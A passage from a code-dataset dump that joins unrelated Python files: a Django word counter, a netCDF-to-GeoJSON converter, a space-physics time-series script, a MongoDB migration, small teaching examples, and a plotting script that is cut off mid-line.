listaTags: \n exec(tag)\n \n \n #add Tags em SCan\n aux = 0;\n for tag in listaTags:\n tag_ = tag\n tag_ = tag_[:len(tag_)-1]\n tag_ = tag_.split(\",\")\n tag = (tag_[1]).replace(\")\",\"\").replace(\"'\",\"\")\n #print \"9=\", tag\n #print tagsAdapter\n for adapter in tagsAdapter:\n if eval(adapter) == eval(tag)._adapter:\n #print \"adapter:\",adapter\n #print \"tag:\",tag \n #print \"É IGUAL\"\n eval(adapter)._t = eval(tag)\n eval(adapter).conect()\n scan.add(eval(tag))\n \n\n \"\"\" \n g = dict ( globals ())\n # Loop sobre pares.\n for item in g.items():\n print(item[0], \"=\", item[1]) , \"\\n\"\n \n print \"\\n \\n\"\n print \"1-tagGeradora =\", eval(\"tagGeradora\")\n print \"1-adapter01._t =\", eval(\"adapter01._t\")\n print \"1-adapter01 =\", eval(\"adapter01\")\n print \"1-tagGeradora._adapter =\", eval(\"tagGeradora._adapter\")\n print \"\\n\"\n print \"2-tagGeradora2 =\", eval(\"tagGeradora2\")\n print \"2-adapter02._t =\", eval(\"adapter02._t\")\n print \"2-adapter02 =\", eval(\"adapter02\")\n print \"2-tagGeradora2._adapter =\", eval(\"tagGeradora2._adapter\")\n print \"\\n\\n\"\n \"\"\"\n \"\"\"\n ('tagGeradora', '=', ) \n ('adapter01', '=', ) \n\n ('tagGeradora2', '=', ) \n ('adapter02', '=', ) \n \"\"\"\n\n #scan.add(tagGeradora)\n \n GeradorThread = threading.Thread(target=scan.run, ) \n GeradorThread.setDaemon(True)\n GeradorThread.start()\n \n MainWindow.show()\n sys.exit(app.exec_())","sub_path":"olds/tests/testsTela/testaTelaXML02.py","file_name":"testaTelaXML02.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"590081146","text":"from django.shortcuts import render\nimport operator\n\ndef home(req):\n return render(req,'home.html')\n\ndef Result(req):\n #get the text from text area\n fulltext = req.GET['word']\n #displays on the terminal\n #print(fulltext)\n wordlist = fulltext.split()\n wordDict = {}\n #loop to create a hashtable with no. of repeats of a word\n for word in wordlist:\n if word in wordDict:\n wordDict[word] += 1\n else:\n wordDict[word]=1\n\n #print(wordDict)\n\n #descending order sorted word and times repeat pair\n wcount = sorted(wordDict.items(),key=operator.itemgetter(1),reverse=True)\n\n return render(req,'CountRes.html',{'EnteredText':fulltext,'Count':len(wordlist),\"sortedwords\":wcount})\n","sub_path":"WordCounter/WordCounter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"514108072","text":"import os\ndef read_txt(filename):\n with open(os.getcwd() + os.sep + \"Data\" + os.sep + filename, \"r\", encoding=\"utf-8\")as f:\n arrs = []\n for i in f.readlines():\n arrs.append(tuple(i.strip().split(\",\")))\n return arrs\n\ndef read_txt_1():\n with open(\"../Data/login.txt\", \"r\", encoding=\"utf-8\")as f:\n arrs = []\n for i in f.readlines():\n arrs.append(tuple(i.strip().split(\",\")))\n return arrs\n\nif __name__ == '__main__':\n\n print(read_txt_1())\n\n\"\"\"\n 1. f.readlines() 返回列表\n 2. i.strip() 去除字符串前后空格、换行符,返回结果为字符串\n 3. split(\",\") 以逗号去拆分字符串,并以列表形式返回\n 4. 由于是遍历每行,所需必须将每行存储到列表中 返回结果为[[],[]]\n 5. 预期结果:[(),()],必须将tuple([[],[]])强转元组\n\"\"\"","sub_path":"Base/read_txt.py","file_name":"read_txt.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"5858378","text":"import xarray as xr\nimport geojson\nimport json\nimport numpy\nfrom geojson import Point,Feature,FeatureCollection\nfrom integr import getDataFileRecord\n\ndef nc2jsonPoint(parameterName,date,time,lat,lng):\n\t#req_data = request.get_json()\n\t#parameterNameReceived = req_data['parameterName']\n\tparameterNameReceived = parameterName\n\n\n\tf = open('apicodes.json')\n\tapicodes = json.load(f)\n\tf.close()\n\tparameterInfo = apicodes[parameterNameReceived]\n\tparameterName = parameterInfo['name']\n\t#date = req_data['date']\n\tfileName = getDataFileRecord(\"copernicus\", date,0)\n\trequestedLat = lat #float(req_data['lat'])\n\trequestedLng = lng #float(req_data['lng'])\n\tdt= xr.open_dataset(fileName)\n\tvar = dt[parameterName]\n\tvar = var.sel(time=date,method=\"nearest\").squeeze()\n\n\tlatitudes = var.coords['latitude'].values.tolist()\n\tlongitudes = var.coords['longitude'].values.tolist()\n\n\tlatIndex=0\n\tlngIndex=0\n\tfor i in range(len(latitudes)):\n\t\tif latitudes[i]>=requestedLat:\n\t\t\tbreak\n\t\telse:\n\t\t\tlatIndex+=1\n\n\tfor i in range(len(longitudes)):\n\t\tif longitudes[i]>=requestedLng:\n\t\t\tbreak\n\t\telse:\n\t\t\tlngIndex+=1\n\n\tval = var.loc[dict(latitude=latitudes[latIndex],longitude=longitudes[lngIndex])]\n\tpointValue = Point((longitudes[lngIndex],latitudes[latIndex]))\n\tdataValue = val.values\n\tfeature = Feature(geometry=pointValue,properties={parameterName:dataValue})\n\treturn feature\n\ndef nc2json(parameterName,date,time):\n\t#req_data = request.get_json()\n\t#parameterNameReceived = req_data['parameterName']\n\tparameterNameReceived = parameterName\n\n\n\tf = open('apicodes.json')\n\tapicodes = json.load(f)\n\tf.close()\n\tparameterInfo = apicodes[parameterNameReceived]\n\tparameterName = parameterInfo['name']\n\t#date = req_data['date']\n\tfileName = getDataFileRecord(\"copernicus\", date,0)\n\tdt= xr.open_dataset(fileName)\n\tvar = dt[parameterName]\n\tvar = var.sel(time=date,method=\"nearest\").squeeze()\n\tfeature_list = []\n\tfor i in var.coords['latitude'].values.tolist():\n\t\tfor j in var.coords['longitude'].values.tolist():\n\t\t\tval = var.loc[dict(latitude=i,longitude=j)]\n\t\t\tpointValue = Point((j,i))\n\t\t\tdataValue = val.values\n\t\t\tfeatureAdded = Feature(geometry=pointValue,properties={parameterName:dataValue})\n\t\t\tfeature_list.append(featureAdded)\n\t\n\tfeature_collection= FeatureCollection(feature_list)\n\treturn feature_collection\n","sub_path":"datamanager/processing_gribnc_data/ncModule.py","file_name":"ncModule.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"578766442","text":"# примеры комплексных чисел\nc1 = 2 + 3j # 2 + 3i, 2 - действительная часть, 3 - мнимая\nc2 = 5 - 5j # 5 + 5i\n\n# построение комплексного числа из вещественных\na = 2\nb = 3\nc3 = complex(a, b)\nc4 = complex(5, -5)\n\nprint(c1, c2)\nprint(c3, c4)\n","sub_path":"Starter/002_Examples/03-complex-example.py","file_name":"03-complex-example.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"426819098","text":"# STITCH THE STUFF TOGETHER -- PUTS THE MODEL OF FITTING DATA \n# TO POLYNOMIALIZATION NUMBER\n\ndef func(A, F):\n return 9.80655 * A / (2 * ((np.pi*F)**2))\n\ndef wrapper(fullpath, freq, format='polynomial'):\n time, xaccel, yaccel, zaccel = readFromCSV(fullpath)\n disp = findDisplacement(time, yaccel, freq)\n warr, samplets, sampleys = getCoeff(time, yaccel, disp)\n\n poly_ans, min_index = getFuncs(warr, samplets, sampleys, freq)\n if format == 'polynomial':\n \treturn poly_ans\n elif format == 'hybrid':\n \tdiscrete_ans = findRoots(samplets, sampleys, freq, min_index)\n \treturn discrete_ans\n else:\n \treturn 'Error: format not found.'\n\ndef findDisplacement(time, accel, freq):\n ftime, faccel = makeFullSamples(time, accel)\n period = 1/float(freq)\n\n start = 0\n shifts = []\n while start < 15: \n sample = ftime[start] + period\n ranked = sorted(ftime, key=lambda x: abs(x-sample))\n shifts.append(list(ftime).index(ranked[0]) - start)\n start = start + 1\n\n result = int(np.average(shifts))\n return result\n\ndef getCoeff(samplets, sampleas, degree = 3):\n warr = []\n for i in range(len(samplets)):\n warr.append(polyFit(samplets[i], sampleas[i], degree))\n return warr\n\n\n","sub_path":"version1/dev/old_version/python_scripts/makeModel.py","file_name":"makeModel.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"65210717","text":"#!/usr/bin/env python\n\"\"\"\npyLTR MIX Time Series\n\nExecute './mixTimeSeries.py --help' for more information.\n\"\"\"\n\n# Custom\nimport pyLTR\n\n# 3rd-party\nimport pylab\nimport numpy\n\n# Standard\nimport pickle\nimport datetime\nimport math\nimport optparse\nimport os\nimport re\nimport sys\n\ndef parseArgs():\n \"\"\"\n Returns standard parameters used for extracting time series data from MIX output.\n - path: Path to a directory containing a MIX run.\n - run: Name of run (ie. 'RUN-IDENTIFIER')\n - t0: datetime object of first step to be used in time series\n - t1: datetime object of last step to be used in time series\n Execute `mixTimeSeries.py --help` for more information.\n \"\"\"\n # additional optparse help available at:\n # http://docs.python.org/library/optparse.html\n # http://docs.python.org/lib/optparse-generating-help.html\n parser = optparse.OptionParser(usage='usage: %prog -p [PATH] [options]',\n version=pyLTR.Release.version)\n\n parser.add_option('-p', '--path', dest='path',\n default='/Users/schmitt/paraview/testData/March1995_LM_r1432_single',\n metavar='PATH', help='Path to base run directory containig MIX HDF files.')\n\n parser.add_option('-r', '--runName', dest='runName',\n default='', metavar='RUN_IDENTIFIER', help='Optional name of run. Leave empty unless there is more than one run in a directory.')\n\n parser.add_option('-f', '--first', dest='t0',\n default='', metavar='YYYY-MM-DD-HH-MM-SS', help='Date & Time that should be the first element of the time series')\n\n parser.add_option('-l', '--last', dest='t1',\n default='', metavar='YYYY-MM-DD-HH-MM-SS', help='Date & Time of last element for the time series')\n\n parser.add_option('-a', '--about', dest='about', default=False, action='store_true',\n help='About this program.')\n\n (options, args) = parser.parse_args()\n if options.about:\n print((sys.argv[0] + ' version ' + pyLTR.Release.version))\n print('')\n print('This script searches a path for any MIX ionosphere output files and ')\n print('computes useful metrics:')\n print(' - Cross Polar Cap Potential (cpcp)')\n print(' - Hemispheric Power (hp)')\n print(' - Positive current density (ipfac)')\n print('for both the Northern and Southern hemispheres.')\n print('')\n print('This script outputs two files:')\n print(' 1. \"runPath/mixTimeSeries.png\" - summary plot of variables')\n print(' 2. \"runPath/mixTimeSeries.pkl\" - pyLTR.TimeSeries file ')\n print(' serialized with the Python Pickle package. See the ')\n print(' Python cPickle documentation for details on extracting ')\n print(' the data.')\n print('To limit the time range, use the \"--first\" and/or \"--last\" flags.')\n print(('Execute \"' + sys.argv[0] + ' --help\" for details.'))\n print('')\n sys.exit()\n\n # --- Sanitize inputs\n\n path = options.path\n assert( os.path.exists(path) )\n\n run = options.runName\n\n # --- Parse date & time strings\n regex = r'^(\\d{4})-' # YYYY year\n regex += r'(0?[1-9]|1[012])-' # MM month\n regex += r'(0?[1-9]|[12]\\d|3[01])-' # DD day \n regex += r'(0?\\d|1\\d|2[0-4])-' # HH hours\n regex += r'([0-5]?\\d?|60)-'# MM minutes\n regex += r'([0-5]?\\d?|60)$' # SS seconds\n t0 = None\n\n if options.t0:\n g = re.match(regex, options.t0).groups()\n assert( len(g) == 6 ) # Year, Month, Day, Hour, Minute, Second\n t0 = datetime.datetime( int(g[0]), int(g[1]), int(g[2]), int(g[3]), int(g[4]), int(g[5]) )\n\n # --- Make sure the datetime string is valid\n t1 = None\n if options.t1:\n g = re.match(regex, options.t1).groups()\n assert( len(g) == 6 ) # Year, Month, Day, Hour, Minute, Second\n t1 = datetime.datetime( int(g[0]), int(g[1]), int(g[2]), int(g[3]), int(g[4]), int(g[5]) )\n \n return (path, run, t0, t1)\n\ndef extractQuantities(path, run, t0, t1):\n \"\"\"\n Extract MIX quantities from the input path.\n \n Execute `mixTimeSeries.py --help` for details on the function parameters (path,run,t0,t1).\n \n Outputs a pyLTR.TimeSeries object containing the data.\n \"\"\"\n data = pyLTR.Models.MIX(path, run)\n\n # hard-coded input for testing & debugging:\n #data = pyLTR.Models.LFM('/hao/aim2/schmitt/data/LTR-2_0_1b/r1432/March1995/LR/single', 'LRs')\n \n #Make sure variables are defined in the model.\n modelVars = data.getVarNames()\n for v in ['Grid X', 'Grid Y', \n 'Potential North [V]', 'Potential South [V]', \n 'FAC North [A/m^2]', 'FAC South [A/m^2]',\n 'Pedersen conductance North [S]', 'Pedersen conductance South [S]', \n 'Hall conductance North [S]', 'Hall conductance South [S]', \n 'Average energy North [keV]', 'Average energy South [keV]',\n 'Number flux North [1/cm^2 s]', 'Number flux South [1/cm^2 s]']:\n assert( v in modelVars )\n\n timeRange = data.getTimeRange()\n if len(timeRange) == 0:\n raise Exception(('No data files found. Are you pointing to the correct run directory?'))\n\n index0 = 0\n if t0:\n for i,t in enumerate(timeRange):\n if t0 >= t:\n index0 = i\n\n index1 = len(timeRange)-1\n if t1:\n for i,t in enumerate(timeRange):\n if t1 >= t:\n index1 = i \n\n print(( 'Extracting MIX quantities for time series over %d time steps.' % (index1-index0) ))\n \n # Output a status bar displaying how far along the computation is.\n progress = pyLTR.StatusBar(0, index1-index0)\n progress.start()\n\n t_doy = []\n cpcpNorth = []\n cpcpSouth = []\n hpNorth = []\n hpSouth = []\n ipfacNorth = []\n ipfacSouth = []\n\n # Pre-compute area of the grid.\n x = data.read('Grid X', timeRange[index0])\n y = data.read('Grid Y', timeRange[index0])\n # Fix singularity at the pole\n x[:,0] = 0.0\n y[:,0] = 0.0\n z = numpy.sqrt(1.0-x**2-y**2)\n ri = 6500.0e3 # Radius of ionosphere\n areaMixGrid = pyLTR.math.integrate.calcFaceAreas(x,y,z)*ri*ri\n\n for i,time in enumerate(timeRange[index0:index1]):\n try:\n # -- Day of Year\n tt = time.timetuple()\n t_doy.append(tt.tm_yday+tt.tm_hour/24.0+tt.tm_min/1440.0+tt.tm_sec/86400.0)\n\n # --- Cross Polar Cap Potential\n psiNorth = data.read('Potential North [V]', time) / 1000.0\n cpcpNorth.append(psiNorth.max() - psiNorth.min())\n\n psiSouth = data.read('Potential South [V]', time) / 1000.0\n cpcpSouth.append(psiSouth.max() - psiSouth.min())\n \n # --- Hemispheric Power\n energy = data.read('Average energy North [keV]', time)\n flux = data.read('Number flux North [1/cm^2 s]', time)\n hp = areaMixGrid*energy[:-1,:-1] * flux[:-1,:-1]\n # KeV/cm^2s to mW/m^2 to GW\n hpNorth.append(hp.sum() * 1.6e-21) \n\n energy = data.read('Average energy South [keV]', time)\n flux = data.read('Number flux South [1/cm^2 s]', time)\n hp = areaMixGrid*energy[:-1,:-1] * flux[:-1,:-1]\n # KeV/cm^2s to mW/m^2 to GW\n hpSouth.append(hp.sum() * 1.6e-21)\n\n # --- Positive current density\n fac = data.read('FAC North [A/m^2]', time)\n fac[fac <= 0] = 0.0\n pfac = areaMixGrid * fac[:-1,:-1]\n ipfacNorth.append(pfac.sum()/1.0e6)\n\n fac = data.read('FAC South [A/m^2]', time)\n fac[fac <= 0] = 0.0\n pfac = areaMixGrid * fac[:-1,:-1]\n ipfacSouth.append(pfac.sum()/1.0e6)\n\n progress.increment()\n except KeyboardInterrupt:\n # Exit when the user hits CTRL+C.\n progress.stop()\n progress.join() \n print('Exiting.')\n import sys\n sys.exit(0)\n except:\n # Cleanup progress bar if something bad happened.\n progress.stop()\n progress.join()\n raise\n progress.stop()\n progress.join()\n\n dataNorth = pyLTR.TimeSeries()\n dataSouth = pyLTR.TimeSeries()\n dataNorth.append('datetime', 'Date & Time', '', timeRange[index0:index1])\n dataSouth.append('datetime', 'Date & Time', '', timeRange[index0:index1])\n dataNorth.append('doy', 'Day of Year', '', t_doy)\n dataSouth.append('doy', 'Day of Year', '', t_doy)\n \n # \"N\" and \"S\" label subscripts are redundant here, potentially leading to\n # mis-labeling of plots\n #dataNorth.append('cpcp', r'$\\Phi_N$', 'kV', cpcpNorth)\n #dataSouth.append('cpcp', r'$\\Phi_S$', 'kV', cpcpSouth)\n #\n #dataNorth.append('hp', r'$HP_N$', 'GW', hpNorth)\n #dataSouth.append('hp', r'$HP_S$', 'GW', hpSouth)\n #\n #dataNorth.append('ipfac', r'$FAC_N$', 'MA', ipfacNorth)\n #dataSouth.append('ipfac', r'$FAC_S$', 'MA', ipfacSouth)\n \n dataNorth.append('cpcp', r'$\\Phi$', 'kV', cpcpNorth)\n dataSouth.append('cpcp', r'$\\Phi$', 'kV', cpcpSouth)\n \n dataNorth.append('hp', r'$HP$', 'GW', hpNorth)\n dataSouth.append('hp', r'$HP$', 'GW', hpSouth)\n \n dataNorth.append('ipfac', r'$FAC$', 'MA', ipfacNorth)\n dataSouth.append('ipfac', r'$FAC$', 'MA', ipfacSouth)\n\n return (dataNorth, dataSouth)\n\nif __name__ == '__main__':\n\n (path, run, t0, t1) = parseArgs()\n\n (dataNorth, dataSouth) = extractQuantities(path, run, t0, t1)\n \n # --- Dump a pickle!\n print('Serializing pyLTR.TimeSeries object of MIX data using the Python Pickle package.')\n filename = os.path.join(path, 'mixTimeSeries.pkl')\n print(('Writing ' + filename))\n fh = open(filename, 'wb')\n pickle.dump([dataNorth, dataSouth], fh, protocol=2)\n fh.close()\n\n # --- Make a plot of everything\n print('Creating summary plot of MIX time series data.')\n filename = os.path.join(path, 'mixTimeSeries.png')\n print(('Writing ' + filename))\n pyLTR.Graphics.TimeSeries.MultiPlotN([dataNorth, dataSouth], \n 'datetime', ['cpcp', 'hp', 'ipfac'], \n ['r','b'], ['North', 'South'])\n pylab.gcf().autofmt_xdate()\n pylab.title(os.path.join(path, run))\n pylab.savefig(filename,dpi=1200)\n","sub_path":"scripts/mixTimeSeries.py","file_name":"mixTimeSeries.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"133934894","text":"import subprocess\nfrom distutils.core import setup, Extension\n\n\ndef pkgconfig(flag, package):\n p = subprocess.Popen(['pkg-config', flag, package],\n stdout=subprocess.PIPE)\n return p.stdout.read().split()\n\n\nmod = Extension('bulletphysics',\n sources=['src/bulletphysics.cpp',\n 'src/DbvtBroadphase.cpp',\n 'src/DefaultCollisionConfiguration.cpp',\n 'src/CollisionDispatcher.cpp',\n 'src/SequentialImpulseConstraintSolver.cpp',\n 'src/DiscreteDynamicsWorld.cpp',\n 'src/Vector3.cpp',\n 'src/Quaternion.cpp',\n 'src/CollisionShape.cpp',\n 'src/StaticPlaneShape.cpp',\n 'src/SphereShape.cpp',\n 'src/Transform.cpp',\n 'src/DefaultMotionState.cpp',\n 'src/RigidBodyConstructionInfo.cpp',\n 'src/RigidBody.cpp',\n 'src/BoxShape.cpp',\n 'src/PersistentManifold.cpp',\n 'src/VehicleTuning.cpp',\n 'src/WheelInfo.cpp',\n 'src/DefaultVehicleRaycaster.cpp',\n 'src/RaycastVehicle.cpp',\n 'src/CompoundShape.cpp',\n 'src/CylinderShape.cpp',\n ],\n extra_compile_args=pkgconfig('--cflags', 'bullet'),\n extra_link_args=pkgconfig('--libs', 'bullet'))\n\nsetup(\n name='bulletphysics',\n version='0.1',\n description='python wrapper for bulletphysics library',\n ext_modules=[mod],\n author='20tab S.r.l.',\n author_email='info@20tab.com',\n url='https://github.com/20tab/pybulletphysics',\n license='MIT License'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"349977743","text":"\nword={0:'zero', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine', 10:'ten', 11:'eleven', 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen', 17:'seventeen', 18:'eighteen', 19:'nineteen', 20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty', 70:'seventy', 80:'eighty', 90:'ninety', 100:'hundred'}\n\nhundred=100\nten=10\n\ndef aswords(n):\n # Returns a textual description of a number in the range 0..999.\n words = ''\n hundreds = n//hundred\n remainder = n%100\n if hundreds>0:\n words=word[hundreds]+' '+word[hundred]\n if remainder>0:\n words=words+' and '\n if remainder>0:\n if remainder<21:\n words=words+word[n%hundred]\n else:\n tens = remainder//ten\n units = remainder%ten\n words = words+word[tens*ten]\n if units>0:\n words = words+' '+word[units]\n if hundreds==0 and remainder==0:\n words=word[n]\n return words\n","sub_path":"Programs/number_util.py/numberutil.py","file_name":"numberutil.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"229539566","text":"from mongodb_migrations.base import BaseMigration\n\n\n########################################################################################################################\n#\n# The sequences are required and have been added to:\n# - contributors.preprocesses\n# - coverages.preprocesses\n# - coverages.environments\n# - coverages.environments.publication_platforms\n# This migration allows old invalid data to be managed\n#\n########################################################################################################################\n\n\nclass Migration(BaseMigration):\n def _fix_preprocess_missing_sequence(self, preprocesses):\n preprocess_without_sequence = [p for p in preprocesses if not p.get(\"sequence\")]\n for idx_preprocess, preprocess in enumerate(preprocess_without_sequence):\n preprocess[\"sequence\"] = idx_preprocess\n\n def _fix_coverage_environments_missing_sequence(self, coverage):\n envs = coverage.get(\"environments\", []).items()\n env_without_sequence = [e for e_name, e in envs if not e.get(\"sequence\")]\n for idx_env, env in enumerate(env_without_sequence):\n env[\"sequence\"] = idx_env\n\n for e_name, env in envs:\n platform_without_sequence = [p for p in env.get(\"publication_platforms\", []) if not p.get(\"sequence\")]\n for idx_platform, platform in enumerate(platform_without_sequence):\n platform[\"sequence\"] = idx_platform\n return coverage\n\n def upgrade_coverages(self):\n all_coverages = self.db[\"coverages\"].find()\n for coverage in all_coverages:\n self._fix_preprocess_missing_sequence(coverage.get(\"preprocesses\", []))\n self._fix_coverage_environments_missing_sequence(coverage)\n self.db[\"coverages\"].save(coverage)\n\n def upgrade_contributors(self):\n all_contributors = self.db[\"contributors\"].find()\n for contributor in all_contributors:\n self._fix_preprocess_missing_sequence(contributor.get(\"preprocesses\", []))\n self.db[\"contributors\"].save(contributor)\n\n def upgrade(self):\n self.upgrade_contributors()\n self.upgrade_coverages()\n","sub_path":"migrations/20170726145800.py","file_name":"20170726145800.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"566736708","text":"# Program to list the Prime Numbers\nfrom functools import reduce\nfor number in range(2,15):\n # A Prime number will be divisible only by 1 and the number itself\n # So the Summation of its divisors will be 1 greater than the number\n # Eg: 7 is divisible by 1 and 7. Also 7 = (1+7) - 1\n if number == int(reduce(lambda x,y:x+y,list(filter(lambda a: number % a == 0, range(1,number+1))))) - 1:\n print(\"%d is Prime\" %number)\n \n \n\"\"\"\nOutput:\nPython 3.6.1 (default, Dec 2015, 13:05:11)\n[GCC 4.8.2] on linux\n \n2 is Prime\n3 is Prime\n5 is Prime\n7 is Prime\n11 is Prime\n13 is Prime\n\"\"\"","sub_path":"programs/prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460420373","text":"# %% Packages\n\nimport os\nimport sys\n\nsys.path.append(\n os.path.join(os.path.join(os.path.dirname(__file__), os.pardir), os.pardir)\n)\n\nimport pickle\nfrom copy import deepcopy\nfrom distutils.spawn import find_executable\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\nfrom homeostatic.definitions import level_position\n\nif find_executable(\"latex\"):\n plt.rcParams.update({\"text.usetex\": True})\n plt.rcParams[\"text.latex.preamble\"] = r\"\\usepackage{graphicx}\\usepackage{eucal}\"\nsns.set(font=\"serif\")\nsns.set_style(\"ticks\")\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.rcParams[\"mathtext.fontset\"] = \"dejavuserif\"\n\n# %% Plotting distributions\n\n\nepsilon = 0.0001\nmeans = []\n\nwith open(\"Established/Parameters.bin\", \"rb\") as file:\n load_data = pickle.load(file)\n\n dimension_value = load_data[1]\n max_level_value = load_data[2]\n stimulus_value = load_data[5]\n\n del load_data\n\nall_marginals = []\nall_means = []\n\nfor model in range(2):\n with open(f\"Established/Data-{model + 1}-0.bin\", \"rb\") as file:\n data = pickle.load(file)\n\n captured = 0\n for captured_level in range(len(data)):\n captured += sum(data[captured_level])\n if captured >= 1 - epsilon:\n captured_level += 1\n break\n\n captured_range = captured_level - dimension_value + 1\n\n mean_value = [0, 0]\n distribution = np.zeros((captured_range, captured_range))\n for k in range(distribution.shape[0]):\n for m in range(distribution.shape[1]):\n if k + m <= captured_level:\n distribution[k][m] += data[k + m][\n level_position(\n k + m + dimension_value, dimension_value, [k + 1, m + 1]\n )\n ]\n mean_value[0] += (k + 1) * distribution[k][m]\n mean_value[1] += (m + 1) * distribution[k][m]\n\n marginals = [np.zeros(captured_range), np.zeros(captured_range)]\n for k in range(distribution.shape[0]):\n for m in range(distribution.shape[1]):\n marginals[0][k] += distribution[k, m]\n marginals[1][m] += distribution[k, m]\n\n means.append(mean_value)\n\n all_marginals.append(deepcopy(marginals))\n all_means.append(deepcopy(means))\n\n fig, graph = plt.subplots(1, 1, constrained_layout=True)\n\n ticks = np.arange(-1, 18, 5)\n ticks[0] = 0\n\n h_map = graph.imshow(distribution, cmap=\"Greens\", interpolation=\"none\")\n c_bar = fig.colorbar(h_map)\n c_bar.outline.set_visible(False)\n graph.plot(mean_value[0] - 1, mean_value[1] - 1, \"^\", color=\"blue\", ms=10)\n graph.set_facecolor(\"white\")\n graph.spines[\"bottom\"].set_color(\"white\")\n graph.spines[\"top\"].set_color(\"white\")\n graph.spines[\"right\"].set_color(\"white\")\n graph.spines[\"left\"].set_color(\"white\")\n graph.set_xlabel(\"$n_{2}$\")\n graph.set_ylabel(\"$n_{3}$\")\n graph.set_xlim(-0.5, 17.5)\n graph.set_ylim(-0.5, 17.5)\n graph.set_xticks(ticks)\n graph.set_xticklabels(ticks + 1)\n graph.set_yticks(ticks)\n graph.set_yticklabels(ticks + 1, rotation=90)\n plt.title(\"QSD approximation using $\\\\mathcal{X}^{\" + f\"({model + 1})\" + \"}$\")\n\n fig.savefig(f\"QSD-2-clones-{model + 1}.pdf\")\n\n graph.clear()\n fig.clear()\n plt.close(fig=\"all\")\n\n\nwith open(\"Established/Gillespie/Data.bin\", \"rb\") as file:\n data = pickle.load(file)\n\nmarginal_g1 = np.zeros(179)\nmarginal_g2 = np.zeros(179)\nfor i in range(data.shape[0]):\n for j in range(data.shape[1]):\n marginal_g1[i] += data[i, j]\n marginal_g2[j] += data[i, j]\n\nmarginal_g1 = marginal_g1 / marginal_g1.sum()\nmarginal_g2 = marginal_g2 / marginal_g2.sum()\n\nfig, graph = plt.subplots(1, 1, constrained_layout=True, figsize=(4.5, 3.5))\n\nwidth = 0.25\nticks = np.arange(0, 18)\nticks_1 = np.arange(0, all_marginals[0][0].shape[0])\nticks_2 = np.arange(0, all_marginals[1][0].shape[0])\nticks_g = np.arange(0, marginal_g1.shape[0])\nbars_1 = graph.bar(\n ticks_1 - (3 / 2) * width,\n all_marginals[0][0],\n width,\n label=\"$\\\\mathcal{X}^{(1)}$\",\n color=\"Green\",\n linewidth=0.8,\n)\ngill = graph.bar(\n ticks_g - width / 2,\n marginal_g1,\n width,\n label=\"$\\\\textrm{Gillespie}$\",\n color=\"red\",\n linewidth=0.8,\n)\nbars_2s = graph.bar(\n ticks_2 - 1 + width / 2,\n all_marginals[1][0],\n width,\n label=\"$\\\\textrm{Shifted } \\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n hatch=\"///\",\n linewidth=0.8,\n)\nbars_2 = graph.bar(\n ticks_2 + (3 / 2) * width,\n all_marginals[1][0],\n width,\n label=\"$\\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n linewidth=0.8,\n)\ngraph.set_xticks(ticks)\ngraph.set_xticklabels(ticks + 1)\ngraph.set_xlim(-1, 18)\ngraph.set_ylim(0, 0.2)\ngraph.legend(loc=\"upper right\")\ngraph.set_xlabel(\"$n_{2}$\")\ngraph.set_title(\"$\\\\textrm{Marginal distribution of } n_{2}$\")\n\nfig.savefig(\"QSD-2-clones-n2.pdf\")\nfig.clear()\nplt.close(fig=\"all\")\n\nfig, graph = plt.subplots(1, 1, constrained_layout=True, figsize=(4.5, 3.5))\n\nwidth = 0.25\nticks = np.arange(0, 18)\nticks_1 = np.arange(0, all_marginals[0][1].shape[0])\nticks_2 = np.arange(0, all_marginals[1][1].shape[0])\nticks_g = np.arange(0, marginal_g2.shape[0])\nbars_1 = graph.bar(\n ticks_1 - (3 / 2) * width,\n all_marginals[0][1],\n width,\n label=\"$\\\\mathcal{X}^{(1)}$\",\n color=\"Green\",\n linewidth=0.8,\n)\ngill = graph.bar(\n ticks_g - width / 2,\n marginal_g2,\n width,\n label=\"$\\\\textrm{Gillespie}$\",\n color=\"red\",\n linewidth=0.8,\n)\nbars_2s = graph.bar(\n ticks_2 - 1 + width / 2,\n all_marginals[1][1],\n width,\n label=\"$\\\\textrm{Shifted } \\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n hatch=\"///\",\n linewidth=0.8,\n)\nbars_2 = graph.bar(\n ticks_2 + (3 / 2) * width,\n all_marginals[1][1],\n width,\n label=\"$\\\\mathcal{X}^{(2)}$\",\n color=\"blue\",\n linewidth=0.8,\n)\ngraph.set_xticks(ticks)\ngraph.set_xticklabels(ticks + 1)\ngraph.set_xlim(-1, 18)\ngraph.set_ylim(0, 0.2)\ngraph.legend(loc=\"upper 